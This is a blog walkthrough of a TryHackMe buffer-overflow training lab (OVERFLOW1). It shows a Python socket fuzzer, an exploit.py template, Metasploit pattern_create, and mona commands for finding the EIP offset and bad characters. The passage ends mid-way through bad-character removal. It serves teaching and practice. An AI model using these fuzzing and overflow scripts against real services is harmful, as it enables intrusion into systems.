TryHackMe:- Buffer Overflow prep(Overflow 1)

6 min readSep 11, 2021

Practice stack based buffer overflows! This is a free room created by Tib3rius

Room Link:- https://tryhackme.com/room/bufferoverflowprep
My profile:- https://tryhackme.com/p/DrAnonymous95

Task2- OSCP.exe-OVERFLOW1

Step1:- Deploy the VM and log in to the machine using RDP and given credentials.

Command to connect using RDP

Okay now, we are connected to windows machine.
If Windows prompts you to choose a location for your network, choose the “Home” option.

Now right click on the Immunity Debugger icon on the desktop and run it as administrator.

After opening, it will look something like this

· Now, click the open file icon, or choose File -> Open.
· Navigate to the vulnerable-apps folder on the admin user’s desktop, and then the “oscp” folder.
· Select the “oscp” (oscp.exe) binary and click “Open”.
The binary will open in a “paused” state, so click the red play icon or choose Debug -> Run

After running, in a terminal window, the oscp.exe binary should be running, and tells us that it is listening on port 1337.
Now connect to port 1337 on your kali machine.

Now if we go back to Win7 and look at the window that has ocsp.exe running in it we see our connection and subsequent disconnect:

MONA Configuration

The mona script has been preinstalled. To make it easier to work with, we need to configure a working folder using the following command, which we can run in the command input box at the bottom of the Immunity Debugger window.

!mona config -set workingfolder c:\mona\%p

FUZZING

Create a file on your Kali box called fuzzer.py with the following contents:

#!/usr/bin/env python3

import socket, time, sys

ip = "YOUR MACHINE IP"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

Now run the code and see the output.

Here, our script first sent 100 bytes and then it repeated same process after increasing 100 bytes every time until it crashes at 2000 bytes. This means our offset is in the range 1900–2000 bytes.

Now we will generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server. Let’s say 2400 bytes.

Run the following command on your kali terminal.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400

Copy the exploit.py given by tryhackme and replace the payload with the output you got after running above command.

import socket

ip = "YOUR MACHINE IP"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = "Paste the above output here"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

Now reopen the oscp.exe file in the immunity debugger and play it using the same process we did at the beginning.

Run the modified exploit.py script.

The script should crash the oscp.exe server again. Now run the following command in immunity debugger command input area.

!mona findmsp -distance 2400

In this output you should see a line which states:

EIP contains normal pattern : ... (offset XXXX)

We can see from the output that Mona has found the offset to be 1978. So now we again modify exploit.py script and change the offset to 1978, we change the payload back to empty, and we set retn to BBBB.

Restart oscp.exe in Immunity and run the modified exploit.py script again.

The program has crashed again and we are looking for 4B’s . In ASCII, B is 42 thus here we can see 42424242. We have now confirmed how many bytes we need to send to fill the buffer used by program.

Finding Bad Characters

Next we need to check for characters that would be considered bad. This means if our payload contains characters that the program won’t accept then it will fail to execute.

We use Mona to create a file, called bytearray.bin, that contains the same list of character first. Use the following mona command.
!mona bytearray -b “\x00”

Now we need to generate a string of bad chars from \x01 to \xff that is identical to the bytearray. Use the given python script.

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()

Update your exploit.py script and set the payload variable to the string of bad chars the script generates.

Restart oscp.exe in Immunity and run the modified exploit.py script again.

Make a note of the address to which the ESP register points and use it in the following mona command:

!mona compare -f C:\mona\oscp\bytearray.bin -a <address>

Possible bad chars 07 08 2e 2f a0 a1

It’s not necessary that all of these be bad chars. Sometimes bad chars cause the next byte to get corrupted as well, or even affect the rest of the string.

Now start removing the bad characters one at a time. Follow these steps.

Remove /X07 from exploit.py.
Restart the oscp.exe
Create new bytearray using mona with /X07 removed. (!mona bytearray -b “\x00\x07”)
Run the exploit.py
Note down nee ESP address
Compare using mona

After removing /x07 and comparing we get